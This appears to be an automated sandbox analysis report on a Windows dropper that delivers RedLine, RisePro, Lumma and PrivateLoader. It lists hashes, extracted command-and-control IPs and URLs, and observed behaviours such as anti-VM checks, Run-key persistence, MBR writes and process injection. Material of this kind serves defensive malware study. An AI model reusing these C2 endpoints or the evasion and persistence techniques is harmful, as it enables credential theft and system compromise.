Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
23-06-2024 16:02
Static task
static1
Behavioral task
behavioral1
Sample
1719158494.319805_WWW2_64.exe
Resource
win10v2004-20240508-en
General
-
Target
1719158494.319805_WWW2_64.exe
-
Size
4.2MB
-
MD5
4234a87227ae02a017a7fe64bb732bbe
-
SHA1
f14926af80b812905dfee9fbcbf23b3f859365ad
-
SHA256
6492dac1d123d1de20756741192a6901dbb2d88966b9434b055566d0a31760a2
-
SHA512
9c56bba97dcca40291c2afec345a260623ebdf40b42c998c081cf7e8821b7bba525bfdf4c08ed537fc251c78d2346d58089aeb9eefe77735873cae40d2203c9f
-
SSDEEP
98304:65SHb/0TC4UKZw7ASfLlkfeK7a7LX+taAYTuJpdGrB:6M/M/JSfLWALX+RYTuzdGrB
Malware Config
Extracted
risepro
77.91.77.66:58709
191.101.209.39
5.42.66.10
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
5.42.65.92:27953
Extracted
lumma
https://disappointcredisotw.shop/api
https://publicitycharetew.shop/api
https://computerexcudesp.shop/api
https://leafcalfconflcitw.shop/api
https://injurypiggyoewirog.shop/api
https://bargainnygroandjwk.shop/api
https://doughtdrillyksow.shop/api
https://facilitycoursedw.shop/api
Signatures
-
Modifies firewall policy service 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" 1719158494.319805_WWW2_64.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral1/memory/5408-605-0x0000000000400000-0x0000000000450000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ pceUgwNB1y0YfqLCqhRMQKLF.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ aD6EeaWc0ANl1UcIU8pjAMdj.exe -
Boot or Logon Autostart Execution: Active Setup 2 TTPs 7 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{48F69C39-1356-4A7B-A899-70E3539D4982}\IsInstalled = "1" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{48F69C39-1356-4A7B-A899-70E3539D4982}\Version = "43,0,0,0" setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components setup.exe Key created \REGISTRY\MACHINE\Software\Microsoft\Active Setup\Installed Components\{48F69C39-1356-4A7B-A899-70E3539D4982} setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{48F69C39-1356-4A7B-A899-70E3539D4982}\ = "AVG Secure Browser" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{48F69C39-1356-4A7B-A899-70E3539D4982}\StubPath = "\"C:\\Program Files\\AVG\\Browser\\Application\\125.0.25426.176\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{48F69C39-1356-4A7B-A899-70E3539D4982}\Localized Name = "AVG Secure Browser" setup.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 976 powershell.exe 3140 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGBrowserUpdate.exe AVGBrowserUpdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGBrowserUpdate.exe\DisableExceptionChainValidation = "0" AVGBrowserUpdate.exe -
Checks BIOS information in registry 2 TTPs 5 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aD6EeaWc0ANl1UcIU8pjAMdj.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion pceUgwNB1y0YfqLCqhRMQKLF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion pceUgwNB1y0YfqLCqhRMQKLF.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aD6EeaWc0ANl1UcIU8pjAMdj.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation AVGBrowserUpdate.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation 1719158494.319805_WWW2_64.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation KWjblQ9QOStACiYYH0rtWTA7.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation c2y5yHQjf6kZmhbO7LNSxYDI.exe Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation aj44C3.exe -
Drops startup file 3 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk aD6EeaWc0ANl1UcIU8pjAMdj.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeWise.url cmd.exe -
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 41 IoCs
pid Process 3380 gMC6A6SQ33iFgmfhOagSNS4i.exe 4020 _OoFSf_wXXkzvnMktDTYroeB.exe 5072 WfTgta5WPjijfB155uWBHHZw.exe 1280 EL4qA80P2nDHu0eoP3SeYX77.exe 3404 aD6EeaWc0ANl1UcIU8pjAMdj.exe 1792 2GKWWeTv71_ZgorTBROaltnj.exe 2656 KWjblQ9QOStACiYYH0rtWTA7.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 4428 YnSvsKhbiLOUOxgxlOlruJrn.exe 3024 pceUgwNB1y0YfqLCqhRMQKLF.exe 2388 4M33CeE5nfQU1rd_j1NV6HLa.exe 840 aspR8VuNtToCuGKBbyNGSSvH.exe 3400 zEfo2aaTGtY8Jlw7voPE_fRy.exe 3664 WfTgta5WPjijfB155uWBHHZw.tmp 3876 setup.exe 4380 setup.exe 5284 Install.exe 5328 freesoundrecorder32.exe 5752 setup.exe 6012 Install.exe 6140 aj44C3.exe 2696 freesoundrecorder32.exe 4000 AVGBrowserUpdateSetup.exe 3656 AVGBrowserUpdate.exe 2640 AVGBrowserUpdate.exe 2440 AVGBrowserUpdate.exe 3096 AVGBrowserUpdateComRegisterShell64.exe 1992 AVGBrowserUpdateComRegisterShell64.exe 3152 AVGBrowserUpdateComRegisterShell64.exe 5244 AVGBrowserUpdate.exe 3700 AVGBrowserUpdate.exe 5132 AVGBrowserUpdate.exe 5376 Assistant_111.0.5168.25_Setup.exe_sfx.exe 5616 eqtpkqwqodik.exe 5800 assistant_installer.exe 3424 assistant_installer.exe 5772 AVGBrowserInstaller.exe 4304 setup.exe 428 setup.exe 6064 Paraguay.pif 2184 Install.exe -
Loads dropped DLL 40 IoCs
pid Process 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 3876 setup.exe 3664 WfTgta5WPjijfB155uWBHHZw.tmp 3664 WfTgta5WPjijfB155uWBHHZw.tmp 3664 WfTgta5WPjijfB155uWBHHZw.tmp 4380 setup.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 5752 setup.exe 2948 c2y5yHQjf6kZmhbO7LNSxYDI.exe 6140 aj44C3.exe 6140 aj44C3.exe 6140 aj44C3.exe 6140 aj44C3.exe 6140 aj44C3.exe 6140 aj44C3.exe 6140 aj44C3.exe 3656 AVGBrowserUpdate.exe 2640 AVGBrowserUpdate.exe 2440 AVGBrowserUpdate.exe 3096 AVGBrowserUpdateComRegisterShell64.exe 2440 AVGBrowserUpdate.exe 1992 AVGBrowserUpdateComRegisterShell64.exe 2440 AVGBrowserUpdate.exe 3152 AVGBrowserUpdateComRegisterShell64.exe 2440 AVGBrowserUpdate.exe 3656 AVGBrowserUpdate.exe 3656 AVGBrowserUpdate.exe 5244 AVGBrowserUpdate.exe 3700 AVGBrowserUpdate.exe 5132 AVGBrowserUpdate.exe 5132 AVGBrowserUpdate.exe 3700 AVGBrowserUpdate.exe 5132 AVGBrowserUpdate.exe 5800 assistant_installer.exe 5800 assistant_installer.exe 3424 assistant_installer.exe 3424 assistant_installer.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral1/files/0x0007000000023596-146.dat themida behavioral1/files/0x0007000000023595-198.dat themida behavioral1/memory/3404-232-0x0000000000300000-0x0000000000EBA000-memory.dmp themida behavioral1/memory/3024-288-0x00000000008A0000-0x000000000108C000-memory.dmp themida behavioral1/memory/3024-289-0x00000000008A0000-0x000000000108C000-memory.dmp themida behavioral1/memory/3024-256-0x00000000008A0000-0x000000000108C000-memory.dmp themida behavioral1/memory/3024-255-0x00000000008A0000-0x000000000108C000-memory.dmp themida behavioral1/memory/3404-333-0x0000000000300000-0x0000000000EBA000-memory.dmp themida behavioral1/memory/3404-315-0x0000000000300000-0x0000000000EBA000-memory.dmp themida behavioral1/memory/3404-294-0x0000000000300000-0x0000000000EBA000-memory.dmp themida behavioral1/memory/3404-311-0x0000000000300000-0x0000000000EBA000-memory.dmp themida behavioral1/memory/3024-314-0x00000000008A0000-0x000000000108C000-memory.dmp themida behavioral1/memory/3024-313-0x00000000008A0000-0x000000000108C000-memory.dmp themida behavioral1/memory/3404-293-0x0000000000300000-0x0000000000EBA000-memory.dmp themida behavioral1/memory/3024-307-0x00000000008A0000-0x000000000108C000-memory.dmp themida behavioral1/memory/3024-306-0x00000000008A0000-0x000000000108C000-memory.dmp themida behavioral1/memory/3024-1793-0x00000000008A0000-0x000000000108C000-memory.dmp themida behavioral1/memory/3404-1792-0x0000000000300000-0x0000000000EBA000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" aD6EeaWc0ANl1UcIU8pjAMdj.exe Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" pceUgwNB1y0YfqLCqhRMQKLF.exe -
Checks for any installed AV software in registry 1 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast c2y5yHQjf6kZmhbO7LNSxYDI.exe Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\AVAST Software\Avast c2y5yHQjf6kZmhbO7LNSxYDI.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\AVAST Software\Avast aj44C3.exe Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\AVAST Software\Avast aj44C3.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA pceUgwNB1y0YfqLCqhRMQKLF.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA aD6EeaWc0ANl1UcIU8pjAMdj.exe -
Enumerates connected drives 3 TTPs 2 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: setup.exe File opened (read-only) \??\D: setup.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 37 raw.githubusercontent.com 40 raw.githubusercontent.com 65 raw.githubusercontent.com 89 raw.githubusercontent.com 157 iplogger.org 158 iplogger.org -
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 13 ipinfo.io 14 ipinfo.io 263 ipinfo.io 264 ipinfo.io 9 api.myip.com 10 api.myip.com -
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 5496 powercfg.exe 3104 powercfg.exe 432 powercfg.exe 4464 powercfg.exe 5692 powercfg.exe 3104 powercfg.exe 3976 powercfg.exe 1276 powercfg.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 4 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description ioc Process File opened for modification \??\PhysicalDrive0 aj44C3.exe File opened for modification \??\PhysicalDrive0 AVGBrowserUpdate.exe File opened for modification \??\PhysicalDrive0 AVGBrowserUpdate.exe File opened for modification \??\PHYSICALDRIVE0 _OoFSf_wXXkzvnMktDTYroeB.exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI 1719158494.319805_WWW2_64.exe File opened for modification C:\Windows\System32\GroupPolicy 1719158494.319805_WWW2_64.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini 1719158494.319805_WWW2_64.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol 1719158494.319805_WWW2_64.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3404 aD6EeaWc0ANl1UcIU8pjAMdj.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 3380 set thread context of 5036 3380 gMC6A6SQ33iFgmfhOagSNS4i.exe 117 PID 1280 set thread context of 5408 1280 EL4qA80P2nDHu0eoP3SeYX77.exe 120 PID 3400 set thread context of 5708 3400 zEfo2aaTGtY8Jlw7voPE_fRy.exe 125 PID 2388 set thread context of 1580 2388 4M33CeE5nfQU1rd_j1NV6HLa.exe 180 PID 5616 set thread context of 4348 5616 eqtpkqwqodik.exe 186 PID 5616 set thread context of 5512 5616 eqtpkqwqodik.exe 191 -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\Locales\sw.pak setup.exe File created C:\Program Files (x86)\GUM5C6E.tmp\goopdateres_iw.dll AVGBrowserUpdateSetup.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\goopdateres_is.dll AVGBrowserUpdate.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\goopdateres_tr.dll AVGBrowserUpdate.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\Locales\sr.pak setup.exe File created C:\Program Files (x86)\GUM5C6E.tmp\goopdateres_hu.dll AVGBrowserUpdateSetup.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\goopdateres_th.dll AVGBrowserUpdate.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\125.0.25426.176.manifest setup.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\Locales\he.pak setup.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\Locales\ja.pak setup.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\Locales\ms.pak setup.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\AVGBrowser.VisualElementsManifest.xml setup.exe File created C:\Program Files (x86)\GUM5C6E.tmp\goopdateres_hi.dll AVGBrowserUpdateSetup.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\goopdateres_pt-PT.dll AVGBrowserUpdate.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\chrome.dll setup.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\AVGBrowser.exe setup.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\initial_preferences setup.exe File created C:\Program Files (x86)\GUM5C6E.tmp\acuapi.dll AVGBrowserUpdateSetup.exe File created C:\Program Files (x86)\GUM5C6E.tmp\goopdateres_lv.dll AVGBrowserUpdateSetup.exe File created C:\Program Files (x86)\GUM5C6E.tmp\AVGBrowserUpdateSetup.exe AVGBrowserUpdateSetup.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\goopdateres_fa.dll AVGBrowserUpdate.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateBroker.exe AVGBrowserUpdate.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateWebPlugin.exe AVGBrowserUpdate.exe File opened for modification C:\Program Files\AVG\Browser\Application\SetupMetrics\4304_13363632286767843.pma setup.exe File created C:\Program Files (x86)\GUM5C6E.tmp\goopdateres_lt.dll AVGBrowserUpdateSetup.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\goopdateres_am.dll AVGBrowserUpdate.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\goopdateres_sr.dll AVGBrowserUpdate.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\goopdateres_zh-CN.dll AVGBrowserUpdate.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\resources.pak setup.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\goopdateres_sv.dll AVGBrowserUpdate.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\Locales\id.pak setup.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\Locales\sl.pak setup.exe File created C:\Program Files (x86)\GUM5C6E.tmp\goopdateres_es.dll AVGBrowserUpdateSetup.exe File created C:\Program Files (x86)\GUM5C6E.tmp\goopdateres_ml.dll AVGBrowserUpdateSetup.exe File created C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe AVGBrowserUpdate.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\Locales\es.pak setup.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\Locales\lt.pak setup.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\Locales\pt-PT.pak setup.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\v8_context_snapshot.bin setup.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\vk_swiftshader_icd.json setup.exe File created C:\Program Files (x86)\GUM5C6E.tmp\AVGBrowserUpdateBroker.exe AVGBrowserUpdateSetup.exe File created C:\Program Files (x86)\GUM5C6E.tmp\goopdateres_sw.dll AVGBrowserUpdateSetup.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\goopdateres_ja.dll AVGBrowserUpdate.exe File created C:\Program Files (x86)\GUM5C6E.tmp\AVGBrowserCrashHandler.exe AVGBrowserUpdateSetup.exe File created C:\Program Files (x86)\GUM5C6E.tmp\AVGBrowserUpdateOnDemand.exe AVGBrowserUpdateSetup.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\goopdateres_fr.dll AVGBrowserUpdate.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\psuser.dll AVGBrowserUpdate.exe File created C:\Program Files (x86)\GUM5C6E.tmp\goopdateres_kn.dll AVGBrowserUpdateSetup.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\goopdateres_ca.dll AVGBrowserUpdate.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\aswengineconnector.dll setup.exe File created C:\Program Files (x86)\GUM5C6E.tmp\AVGBrowserUpdateCore.exe AVGBrowserUpdateSetup.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\chrome_100_percent.pak setup.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\Extensions\external_extensions.json setup.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\Locales\gu.pak setup.exe File created C:\Program Files (x86)\GUM5C6E.tmp\goopdateres_el.dll AVGBrowserUpdateSetup.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\goopdateres_en.dll AVGBrowserUpdate.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\goopdateres_kn.dll AVGBrowserUpdate.exe File created C:\Program Files\AVG\Browser\Application\125.0.25426.176\Installer\chrmstp.exe setup.exe File created C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\goopdateres_it.dll AVGBrowserUpdate.exe File created C:\Program Files (x86)\AVG\Browser\Update\Install\{BC0E9756-8EC0-4B7B-B6B8-706433A2C246}\CR_91020.tmp\SETUP.EX_ AVGBrowserInstaller.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\Locales\lv.pak setup.exe File created C:\Program Files\AVG\Browser\Temp\source4304_1098890695\Safer-bin\125.0.25426.176\notification_helper.exe setup.exe File opened for modification C:\Program Files\AVG\Browser\Application\AVGBrowser.exe setup.exe File created C:\Program Files\AVG\Browser\Application\SetupMetrics\28229e8b-019a-45c6-966b-f7c8cde35550.tmp setup.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\bytIiJgDVfAVkgdamS.job schtasks.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4700 sc.exe 5888 sc.exe 5116 sc.exe 5468 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 2 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI aj44C3.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI aj44C3.exe -
Checks processor information in registry 2 TTPs 1 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString MSBuild.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4044 timeout.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 5436 tasklist.exe 5384 tasklist.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{513C6D01-E4A3-4F34-9BD9-3D83C35A3498} AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{513C6D01-E4A3-4F34-9BD9-3D83C35A3498}\AppName = "AVGBrowserUpdateWebPlugin.exe" AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{513C6D01-E4A3-4F34-9BD9-3D83C35A3498}\AppPath = "C:\\Program Files (x86)\\AVG\\Browser\\Update\\1.8.1693.6" AVGBrowserUpdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{513C6D01-E4A3-4F34-9BD9-3D83C35A3498}\Policy = "3" AVGBrowserUpdate.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{28E08968-59C8-4A77-BEBA-12C9394AE077} AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{28E08968-59C8-4A77-BEBA-12C9394AE077}\AppName = "AVGBrowserUpdateBroker.exe" AVGBrowserUpdate.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{28E08968-59C8-4A77-BEBA-12C9394AE077}\AppPath = "C:\\Program Files (x86)\\AVG\\Browser\\Update\\1.8.1693.6" AVGBrowserUpdate.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{28E08968-59C8-4A77-BEBA-12C9394AE077}\Policy = "3" AVGBrowserUpdate.exe -
Modifies data under HKEY_USERS 17 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\AVG\Browser AVGBrowserUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer Install.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" Install.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" Install.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d9c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Install.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" Install.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\AVG\Browser\Update\hostprefix AVGBrowserUpdate.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\AVG\Browser\Update\MachineId = "00009bb098663592a3a6086bcc2909e7" AVGBrowserUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ Install.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\AVG\Browser\Update\endpoint = "update.avgbrowser.com" AVGBrowserUpdate.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\AVG\Browser\Update\MachineIdDate = "20240623" AVGBrowserUpdate.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" Install.exe Key created \REGISTRY\USER\.DEFAULT\Software\AVG\Browser\Update\ AVGBrowserUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software AVGBrowserUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\AVG AVGBrowserUpdate.exe Key created \REGISTRY\USER\.DEFAULT\Software\AVG\Browser\Update AVGBrowserUpdate.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\AVG\Browser\Update\devmode = "0" AVGBrowserUpdate.exe -
Modifies registry class 64 IoCs
